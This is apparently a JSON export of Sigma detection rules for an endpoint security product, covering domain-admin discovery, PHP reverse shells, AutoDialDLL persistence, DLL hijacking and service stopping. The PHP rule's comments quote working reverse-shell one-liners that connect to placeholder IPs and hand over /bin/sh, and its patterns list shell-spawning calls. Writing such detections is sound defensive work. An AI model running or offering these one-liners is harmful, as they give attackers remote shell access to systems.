"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083661Z",
"creation_date": "2026-03-23T11:45:34.083663Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083668Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://sdbrett.com/BrettsITBlog/2016/12/discover-clear-admincount-powershell/",
"https://twitter.com/0gtweet/status/1493963591745220608",
"https://twitter.com/Oddvarmoe/status/927437787242090496",
"https://twitter.com/falsneg/status/1461625526640992260",
"https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw",
"https://attack.mitre.org/techniques/T1087/"
],
"name": "t1087_domain_admin_discovery_ldap_powershell.yml",
"content": "title: Domain Admin Discovered via LDAP by PowerShell\nid: 5f96cb48-bf55-484f-badd-d9da662dabd7\ndescription: |\n Detects an Active Directory Service Interfaces (ADSI) query that may indicate the discovery of domain admins via PowerShell.\n Adversaries may attempt to enumerate domain admin accounts during the discovery phase for privilege escalation and lateral movement.\n It is recommended to investigate the legitimacy of the PowerShell script.\nreferences:\n - https://sdbrett.com/BrettsITBlog/2016/12/discover-clear-admincount-powershell/\n - https://twitter.com/0gtweet/status/1493963591745220608\n - https://twitter.com/Oddvarmoe/status/927437787242090496\n - https://twitter.com/falsneg/status/1461625526640992260\n - https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw\n - https://attack.mitre.org/techniques/T1087/\ndate: 2025/10/20\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'admincount=1'\n - 'admincount = 1'\n - 'admincount -eq 1'\n\n filter_scripts:\n PowershellScriptPath|endswith:\n - '.ps1'\n - '.psd1'\n - '.psm1'\n\n condition: selection and not 1 of filter_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f96cb48-bf55-484f-badd-d9da662dabd7",
"rule_name": "Domain Admin Discovered via LDAP by PowerShell",
"rule_description": "Detects an Active Directory Service Interfaces (ADSI) query that may indicate the discovery of domain admins via PowerShell, based on an adminCount=1 filter in the command.\nAdversaries may attempt to enumerate domain admin accounts during the discovery phase for privilege escalation and lateral movement.\nadminCount=1 is also set on accounts that are or were members of other protected groups, so matches are not limited to Domain Admins.\nIt is recommended to investigate the legitimacy of the PowerShell command and of the user and session that issued it.\nNote that commands executed from .ps1, .psd1 and .psm1 files are filtered out, so this rule only covers inline or interactive commands.\n",
"rule_creation_date": "2025-10-20",
"rule_modified_date": "2025-10-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5f9f5085-ad6a-4474-9c6b-4f614b6e8b54",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600241Z",
"creation_date": "2026-03-23T11:45:34.600244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600252Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_php_linux.yml",
"content": "title: Reverse Shell Executed via PHP\nid: 5f9f5085-ad6a-4474-9c6b-4f614b6e8b54\ndescription: |\n Detects different suspicious usages of PHP that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to investigate the whole process tree for suspicious activities.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/07/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.PHP\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # php -r $sock=fsockopen(\"10.0.0.1\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");\n # php -r $sock=fsockopen(\"10.0.0.1\",1234);popen(\"/bin/sh -i <&3 >&3 2>&3\", \"r\");\n # php -r $s=fsockopen(\"192.168.2.6\",8080);shell_exec(\"/bin/sh -i <&3 >&3 2>&3\");\n # php -r $s=fsockopen(\"192.168.2.6\",8080);system(\"/bin/sh -i <&3 >&3 2>&3\");\n # php -r $s=fsockopen(\"192.168.2.6\",8080);`/bin/sh -i <&3 >&3 2>&3`;\n selection_fsockopen1:\n CommandLine|contains|all:\n - 'php'\n - 'fsockopen('\n - '2>&3'\n\n selection_fsockopen2:\n CommandLine|contains:\n - 'exec('\n - 'popen('\n - 'shell_exec('\n - 'system('\n - '`/bin/sh '\n - '`/bin/bash '\n - '`/bin/ksh '\n - '`/bin/zsh '\n - '`sh '\n - '`bash '\n - '`ksh '\n - '`zsh '\n\n # php -r '$sock=fsockopen(\"10.0.0.1\",1234);$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'\n selection_procopen:\n CommandLine|contains|all:\n - 'php'\n - 'fsockopen('\n - 'proc_open('\n - 'array('\n - '=>'\n condition: (all of selection_fsockopen*) or 
selection_procopen\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5f9f5085-ad6a-4474-9c6b-4f614b6e8b54",
"rule_name": "Reverse Shell Executed via PHP",
"rule_description": "Detects suspicious usages of PHP that are characteristic of reverse shells: a socket opened with fsockopen and handed to a shell through exec, popen, shell_exec, system, backticks or proc_open.\nA reverse shell is a shell session initiated from the compromised machine back to an attacker-controlled host.\nAttackers often use reverse shells to bypass inbound firewall restrictions.\nIt is recommended to investigate the whole process tree for suspicious activities and to identify the remote address and port passed to fsockopen.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fa2c53b-3193-4368-b86d-e1bf0d092af9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071634Z",
"creation_date": "2026-03-23T11:45:34.071637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071641Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_autodial_dll.yml",
"content": "title: Suspicious AutoDialDLL Registry Key Modified\nid: 5fa2c53b-3193-4368-b86d-e1bf0d092af9\ndescription: |\n Detects the creation or modification of the AutoDialDLL registry key that allows payload execution and persistence upon restarting the BITS service.\n This method is used as a means to achieve persistence by replacing the original DLL image with a malicious payload.\n This DLL is also loaded by processes using the WinSock2 library since WinSock2 loads additional DLLs as part of its modular components.\n This allows attackers to use this method as a lateral movement technique since they can plant the malicious AutoDialDLL on a target system, modify the registry and wait for a process to use the WinSock2 API, which will trigger execution.\n It is recommended to investigate the process that performed the registry modification to look for malicious content or actions, as well as to look for the execution of malicious code by the BITS service or software using Winsock2.\nreferences:\n - https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/10/27\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.execution\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinSock2\\Parameters\\AutodialDLL'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_legitimate:\n Details:\n - '?:\\windows\\system32\\rasadhlp.dll'\n - '%SystemRoot%\\system32\\rasadhlp.dll'\n - '%Windir%\\system32\\rasadhlp.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fa2c53b-3193-4368-b86d-e1bf0d092af9",
"rule_name": "Suspicious AutoDialDLL Registry Key Modified",
"rule_description": "Detects the creation or modification of the AutoDialDLL registry key that allows payload execution and persistence upon restarting the BITS service.\nThis method is used as a means to achieve persistence by replacing the original DLL image with a malicious payload.\nThis DLL is also loaded by processes using the WinSock2 library since WinSock2 loads additional DLLs as part of its modular components.\nThis allows attackers to use this method as a lateral movement technique since they can plant the malicious AutoDialDLL on a target system, modify the registry and wait for a process to use the WinSock2 API, which will trigger execution.\nIt is recommended to investigate the process that performed the registry modification to look for malicious content or actions, as well as to look for the execution of malicious code by the BITS service or software using Winsock2.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fa685c8-ce30-4b62-b050-279c87efed32",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097936Z",
"creation_date": "2026-03-23T11:45:34.097938Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097943Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_alg.yml",
"content": "title: DLL Hijacking via ALG.exe\nid: 5fa685c8-ce30-4b62-b050-279c87efed32\ndescription: |\n Detects potential Windows DLL Hijacking via ALG.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ALG.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cryptbase.dll'\n - '\\mswsock.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fa685c8-ce30-4b62-b050-279c87efed32",
"rule_name": "DLL Hijacking via ALG.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ALG.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fadcdde-a704-464c-8db6-76650b015644",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295563Z",
"creation_date": "2026-03-23T11:45:35.295566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295573Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_powershell_stop_service.yml",
"content": "title: Service Stopped via PowerShell\nid: 5fadcdde-a704-464c-8db6-76650b015644\ndescription: |\n Detects the Stop-Service PowerShell cmdlet being used to stop a specific service.\n Attackers can use this command to stop security services to evade detection.\n It is recommended to check the for other suspicious activities by the process launching the PowerShell command.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/10/15\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1489\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ServiceStop\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Stop-Service'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n exclusion_programfiles:\n - ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - ProcessGrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_citrix:\n ProcessImage: '?:\\Program Files\\Citrix\\ConfigSync\\ConfigSyncRun.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Citrix Systems, Inc.'\n # PowershellCommand|contains: 'Stop-Service -Name $serviceName'\n\n exclusion_powershell_management:\n PowershellCommand|contains|all:\n - 'GUID=\"EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D\"'\n - 'Author=\"Microsoft Corporation\"'\n - 'NestedModules=\"Microsoft.PowerShell.Commands.Management.dll\"'\n - 'CmdletsToExport=@(\"Add-Content\",'\n\n exclusion_ansible:\n ProcessCommandLine:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA=='\n ProcessParentCommandLine|startswith:\n - 'PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdA'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQ'\n\n exclusion_sdiagnhost:\n ProcessImage: '?:\\Windows\\System32\\sdiagnhost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentCommandLine|contains|all:\n - 'w32tm.exe /query /source'\n - 'Check-TimeAccurateness $timeServer'\n - 'Stop-Service \"w32time\"'\n\n exclusion_exchange_ui:\n ProcessInternalName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_npcap:\n PowershellCommand|contains: 'Microsoft.PowerShell.Management\\Start-Service -Name npcap -PassThru | Microsoft.PowerShell.Management\\Stop-Service -PassThru | Microsoft.PowerShell.Management\\Start-Service'\n\n exclusion_choco:\n ProcessImage:\n - '?:\\program files\\chocolatey gui\\chocolateygui.exe'\n - '?:\\program files (x86)\\chocolatey gui\\chocolateygui.exe'\n\n exclusion_monitoring_agent:\n # C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Monitoring Host Temporary Files 18220\\27811\\\n PowershellCommand|contains|all:\n - 'schtasks /create /tn DPMDiscoveryHelper /tr ?net start healthservice? 
/st $timeStr /rl highest /sc once /ru system /rp /f'\n - 'Stop-Service healthservice'\n\n exclusion_windowsadmincenter:\n # C:\\Packages\\Plugins\\Microsoft.AdminCenter.AdminCenter\\0.0.0.316\\Sme.VmExtension\\Sme.VmExtension.WindowsAdminCenter\\Sme.VmExtension.WindowsAdminCenter.psm1\n PowershellCommand|contains|all:\n - 'function Stop-WACService {'\n - ' Stop-Service (Get-WacServiceName)'\n - '-ExitCode WACServiceCannotBeStopped'\n\n exclusion_connectcare:\n ProcessImage|endswith: '\\brainlab\\appls\\connectedcare_*\\gateway\\propertiesupdate.exe'\n\n exclusion_fsecure:\n ProcessImage: '?:\\program files (x86)\\f-secure\\psb\\wa_3rd_party_host_32.exe'\n\n exclusion_rudder:\n ProcessCommandLine: 'powershell.exe -noninteractive -nologo -windowstyle hidden -file ?:\\program files\\rudder\\bin\\rudder.ps1 agent run'\n\n exclusion_centrastage:\n ProcessParentImage: '?:\\program files (x86)\\centrastage\\cagservice.exe'\n\n exclusion_fogpatcher:\n ProcessCommandLine: 'powershell.exe -executionpolicy bypass -file ?:\\program files (x86)\\fog\\fogpatcher.ps1'\n\n #exclusion_serviceportalagent:\n # PowershellCommand|contains:\n # - 'Stop-Service -Name $Service -Force'\n # - 'Where-Object { $_.Status -eq \"Running\" } | Stop-Service -Force'\n # - '# net stop does a more efficent job of shutting down the dependent services than Stop-Service'\n # - '$Status | Stop-Service -Force -PassThru | Set-Service -StartupType Disabled | Out-Null'\n # PowershellScriptPath:\n # - '?:\\Program Files\\WindowsPowerShell\\Modules\\MTRP.Powershell.Utils\\\\*\\Public\\\\*.ps1'\n # - '?:\\Program Files\\WindowsPowerShell\\Modules\\MTRP.oPowershell.ExtendedProperties\\\\*\\Public\\\\*.ps1'\n\n exclusion_icinga:\n PowershellCommand|contains|all:\n - 'Test-IcingaForWindowsManagementConsoleExit()'\n - \"Stop-Service'.ToLower()\"\n - '$global:Icinga.InstallWizard.HeaderSelection = $Selection;'\n - 'Read-IcingaPowerShellModuleFile -FileContent $ModuleContent;'\n - 'Deny-IcingaJEACommand -Command 
$Command -FileComment $DeserializedFile.Comment'\n\n exclusion_serviceportalagent:\n ProcessOriginalFileName: 'MmrAgent.NetFxEmulator.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Corporation\"\n\n exclusion_azure:\n ProcessImage: '?:\\Program Files\\AzureConnectedMachineAgent\\GCArcService2\\GC\\gc_worker.exe'\n\n # C:\\Packages\\Plugins\\Microsoft.AdminCenter.AdminCenter\\0.42.0.0\\wacrun.exe\n exclusion_admincenter:\n ProcessOriginalFileName: 'wacrun.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Corporation\"\n\n exclusion_dynatrace:\n ProcessAncestors|contains:\n - '?:\\Program Files\\dynatrace\\oneagent\\agent\\pcap\\dynatrace_onepcap.exe'\n - '?:\\Program Files (x86)\\dynatrace\\oneagent\\agent\\pcap\\dynatrace_onepcap.exe'\n PowershellCommand|contains: '-Name npcap'\n\n exclusion_action1:\n - ProcessAncestors|contains: '?:\\Windows\\Action1\\action1_agent.exe'\n - PowershellCommand|contains: '# NOT CURRENTLY USED: # NEVER change this: must be in sync with the agent code'\n\n exclusion_nsclient_plusplus:\n ProcessAncestors|contains: '?:\\NSClient++\\NSClient++.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5fadcdde-a704-464c-8db6-76650b015644",
"rule_name": "Service Stopped via PowerShell",
"rule_description": "Detects the Stop-Service PowerShell cmdlet being used to stop a specific service.\nAttackers can use this command to stop security services to evade detection.\nIt is recommended to check for other suspicious activities by the process launching the PowerShell command.\n",
"rule_creation_date": "2021-10-15",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5fb64523-1865-4c78-bf2f-2e444dfd0947",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095271Z",
"creation_date": "2026-03-23T11:45:34.095273Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095277Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
"https://attack.mitre.org/techniques/T1082/",
"https://attack.mitre.org/techniques/T1592/001/",
"https://attack.mitre.org/techniques/T1592/002/",
"https://attack.mitre.org/techniques/T1592/004/",
"https://attack.mitre.org/tactics/TA0004/"
],
"name": "t1082_linpeas.yml",
"content": "title: LinPEAS Hacktool Enumeration Command Executed\nid: 5fb64523-1865-4c78-bf2f-2e444dfd0947\ndescription: |\n Detects specific enumeration commands from the linPEAS shell script, a popular Open Source enumeration script for privilege escalation.\n Attackers may try to search for secrets or vulnerabilities present on an infected system to try and elevate their privileges locally or for lateral movement.\n It is recommended to analyze the context behind the execution of the linPEAS tool as well as to look for malicious actions by the same user around this alert.\nreferences:\n - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS\n - https://attack.mitre.org/techniques/T1082/\n - https://attack.mitre.org/techniques/T1592/001/\n - https://attack.mitre.org/techniques/T1592/002/\n - https://attack.mitre.org/techniques/T1592/004/\n - https://attack.mitre.org/tactics/TA0004/\ndate: 2022/10/18\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - attack.reconnaissance\n - attack.t1592.001\n - 